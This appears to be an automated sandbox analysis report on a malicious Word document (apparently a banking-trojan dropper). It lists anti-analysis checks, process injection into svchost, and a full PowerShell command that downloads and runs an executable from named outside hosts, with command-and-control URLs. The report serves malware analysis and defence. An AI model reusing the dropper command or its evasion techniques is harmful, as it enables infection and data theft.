Word Doc. Drops Context Aware Payload

VTI Information

VTI Score 100 / 100
VTI Database Version	2.6
VTI Rule Match Count	30
VTI Rule Type	Documents

Detected Threats

	Anti Analysis	Try to detect application sandbox
	Possibly trying to detect "Sandboxie" by checking for existence of module "SbieDll.dll".
	Possibly trying to detect "Threatexpert" by checking for existence of module "dbghelp.dll".
	Anti Analysis	Try to detect forensic tool
	Check the existence of DLL "SunBelt Sandbox".
	Check the existence of DLL "Winsock Packet Editor".
	Injection	Write into memory of another process
	"c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" modifies memory of "c:\windows\system32\svchost.exe"
	Process	Create process
	Create process "cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" \| Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden"".
	Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
	Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat".
	Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe".
	Create process "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe".
	Create process "svchost.exe".
	Process	Read from memory of another process
	"c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" reads from "svchost.exe".
	Process	Execute encoded PowerShell script
	Execute encoded PowerShell script to possibly hide malicious payload.
	File System	Handle with malicious files
	File "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe" is a known malicious file.
	Network	Download data
	URL "www.events4u.cz/kas23.png".
	URL "myexternalip.com/raw".
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/".
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/".
	Network	Perform DNS request
	Resolve host name "www.events4u.cz".
	Network	Check external IP address
	Check external IP by asking IP info service at "myexternalip.com/raw".
	Network	Connect to remote host
	Outgoing TCP connection to host "93.185.102.11:80".
	PE	Execute dropped PE file
	Execute dropped file "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe".
	Network	Connect to HTTP server
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/".
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/".
	URL "myexternalip.com/raw".
	URL "212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/".
	URL "www.events4u.cz/kas23.png".
	PE	Drop PE file
	Drop file "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe".
	VBA Macro	Execute application
	Shell myform1.TextBox2, 0
	Process	Create system object
	Create mutex with name "Global\.net clr networking".
	Create mutex with name "Global\VLock".
	PE	PE file is packed
	File "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe" is packed with "Armadillo v1.71".
	File "\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe" is packed with "Armadillo v1.71".
	VBA Macro	Execute macro on specific worksheet event
	Execute macro on "Activate Workbook" event.